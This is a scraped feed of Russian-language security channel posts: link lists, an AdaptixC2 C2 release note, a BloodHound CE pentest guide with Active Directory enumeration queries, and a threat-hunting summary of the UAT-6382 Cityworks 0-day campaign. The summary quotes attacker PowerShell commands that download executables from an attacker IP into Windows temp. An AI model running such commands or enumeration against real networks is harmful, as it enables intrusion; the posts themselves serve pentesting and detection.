Fsecurity | HH

dMSASync.py P.S. I hope the last one (by @snovvcrash)

AdaptixC2 v0.5 is out https://github.com/Adaptix-Framework/AdaptixC2 * Windows "gopher" agent * Fast socks5 tunnels via "gopher" agent * New Remote Terminal * New Client side tunnels More details in the changelog: https://adaptix-framework.gitbook.io/adaptix-framework/changelog/v0.4-greater-than-v0.5

🔗Ссылка: https://opennet.ru/63322/

🔗Ссылка: https://www.securitylab.ru/news/559819.php

🔗Ссылка: https://www.securitylab.ru/news/559694.php?r=1

Discord сервер 👆🏻Тут можно пообщаться и найти много полезной информации 🦈

🔗Ссылка: https://www.securitylab.ru/news/559808.php?r=1

🔄😉 BloodHound CE v7.3.1 Обновление инструмента для выявления связей и построения графов в 💻 Active Directory. Достаточно учетной записи доменного пользователя. Отличный инструмент при пентесте 💻 AD среды. Для сбора информации используются коллекторы bloodhound-ce или SharpHound Bonus: BadSuccessor query - dMSA (delegated Managed Service Account) в Windows Server 2025

MATCH (c1:Computer)-[:MemberOf*1..]->(g:Group) WHERE g.objectsid ENDS WITH '-516' WITH COLLECT(c1.name) AS dcs MATCH (c2:Computer) WHERE c2.enabled = true AND (c2.operatingsystem contains '2025') AND (c2.name IN dcs) RETURN c2.name

Установка:

curl -L https://ghst.ly/getbhce | docker compose -f - up

http://localhost:8080/ui/login

Логин admin и сгенерированный пароль Для обновления переходим в директорию с docker-compose.yml и запускаем:

docker compose pull && docker compose up

Сбор информации:

python3 bloodhound-python -u domain_user -p 'P@ss' -ns 10.0.0.1 -d contoso.com -c all --dns-tcp

Neo4j запросы:

# Domain Admins и время установки пароля
MATCH (g:Group) WHERE g.name =~ "(?i).*DOMAIN ADMINS.*" WITH g MATCH (g)<-
[r:MemberOf*1..]-(u) RETURN u.name AS User,
datetime({epochSeconds:toInteger(u.pwdlastset)}) as passwordLastSet, datetime({epochSeconds: toInteger(u.whencreated)}) AS dateCreated ORDER BY u.pwdlastset

# Сервисные УЗ, время установки пароля, дата создания
MATCH (u:User) WHERE u.hasspn=true AND (NOT u.name STARTS WITH 'KRBTGT') RETURN u.name
AS accountName, datetime({epochSeconds: toInteger(u.pwdlastset)}) AS passwordLastSet,
datetime({epochSeconds: toInteger(u.whencreated)}) AS dateCreated ORDER BY u.pwdlastset

# Пользователи и описание
MATCH (u:User) RETURN u.name as username, u.description as description

# Domain Admins или Administrators с сессией исключая DC
MATCH (c1:Computer)-[:MemberOf*1..]->(g:Group) WHERE g.objectid ENDS WITH '-516' WITH
COLLECT(c1.name) AS domainControllers
MATCH (n:User)-[:MemberOf*1..]->(g:Group) WHERE g.objectid ENDS WITH '-512' OR
g.objectid ENDS WITH '-544'
MATCH p = (c:Computer)-[:HasSession]->(n) WHERE NOT c.name in domainControllers return
p

# Неограниченное делегирование исключая DC
MATCH (c1:Computer)-[:MemberOf*1..]->(g:Group) WHERE g.objectid ENDS WITH '-516' WITH
COLLECT(c1.name) AS domainControllers
MATCH (c:Computer {unconstraineddelegation:true}) WHERE NOT c.name IN domainControllers
RETURN c

# Пользователи с ограниченным делегированием
MATCH p = ((u:User)-[r:AllowedToDelegate]->(c:Computer)) RETURN p

Подробный гайд: ➡️ The Ultimate Guide BHCE ➡️ Адаптация на русском ADCS атаки: ➡️ Part 1 ➡️ Part 2 ➡️ Part 3 Ссылки: 💻 Home 💻 Download ➡️ Docs P.S. Сам таки полностью перешел на CE версию и legacy использовать больше желания нет 👍😅 #bloodhound #pentest #active_directory #soft #bhce ✈️ Whitehat Lab 💬 Chat

🔗Ссылка: https://github.com/rstcloud/awesome-threat-actor-resources

Discord сервер 👆🏻Тут можно пообщаться и найти много полезной информации 🦈

🔗Ссылка: https://www.securitylab.ru/news/559773.php

🔗Ссылка: https://habr.com/ru/companies/bastion/articles/910626/

🔗Ссылка: https://habr.com/ru/companies/kaspersky/articles/912940/

🔗Ссылка: https://habr.com/ru/articles/913004/

Discord сервер 👆🏻Тут можно пообщаться и найти много полезной информации 🦈

🔗Ссылка: https://habr.com/ru/articles/913076/

🔗Ссылка: https://spy-soft.net/find-ip-address-telegram/

C2 Redirectors: Advanced Infrastructure for Modern Red Team Operations * read Отдельно порадовало

iptables -A INPUT -m geoip --src-cc RU,CN -j DROP

🔗Ссылка: https://www.securitylab.ru/news/559744.php

⚙️ Кампания UAT-6382: эксплуатация 0-day в Cityworks Cisco Talos выявила серию атак от группы UAT-6382, использующей 0-day уязвимость CVE-2025-0994 (deserialization RCE) в платформе Cityworks, применяемой органами местного самоуправления США. 🧰 Инструментарий 🔸 WebShells AntSword, Chopper (chinatso), Behinder — размещаются в inetpub\wwwroot, используются как бэкдоры. 🔸 TetraLoader (загрузчик на Rust) Скомпилирован с использованием MaLoader — malware-билдера. Распаковывает shellcode и внедряет его в легитимные процессы (`notepad.exe`, dllhost.exe, gpupdate.exe`) через `NtMapViewOfSection, RtlCreateUserThread и др. 🔸 Payloads Cobalt Strike Beacons — используют HTTPS C2 (например, cdn[.]lgaircon[.]xyz`) и маскируются под .js`-запросы. VShell — легкий RAT на Go: команды, прокси, скриншоты, файловые операции. Панель управления преимущественно на китайском. 🔎 Hunting Notes 🔹 Обнаруженные команды:

cmd.exe /c ipconfig cmd.exe /c pwd cmd.exe /c dir cmd.exe /c dir .. cmd.exe /c dir c:\ cmd.exe /c dir c:\inetpub cmd.exe /c tasklist cmd.exe /c dir c:\inetpub\wwwroot cmd.exe /c dir c:\inetpub\wwwroot\CityworksServer\WebSite cmd.exe /c dir c:\inetpub\wwwroot\CityworksServer\WebSite\Assets cmd.exe /c dir c:\inetpub\wwwroot\CityworksServer\ cmd.exe /c copy c:\inetpub\wwwroot\CityworksServer\<backup_archives> c:\inetpub\wwwroot\CityworksServer\Uploads\ powershell -Command Invoke-WebRequest -Uri 'http://IP:3219/LVLWPH.exe' -OutFile '<путь>\LVLWPH.exe' powershell -Command Invoke-WebRequest -Uri 'http://IP:3219/MCUCAT.exe' -OutFile 'C:\windows\temp\z1.exe' powershell -Command Invoke-WebRequest -Uri 'http://IP:3219/TJPLYT.exe' -OutFile 'C:\windows\temp\z33.exe' powershell -Command Invoke-WebRequest -Uri 'http://IP:3219/z44.exe' -OutFile 'C:\windows\temp\z44.exe'

🔹 Что ещё искать: PowerShell с Invoke-WebRequest к IP-адресам Размещение ASP/ASPX файлов в inetpub\wwwroot Инъекции в dllhost.exe, gpupdate.exe, notepad.exe C2-домены Запросы к URI вроде /jquery-3.3.1.min.js, /owa/... — подделка под легитимный JS-трафик Rust-бинарники со встроенным shellcode и артефактами MaLoader 🔗https://blog.talosintelligence.com/uat-6382-exploits-cityworks-vulnerability/ 🦔 THF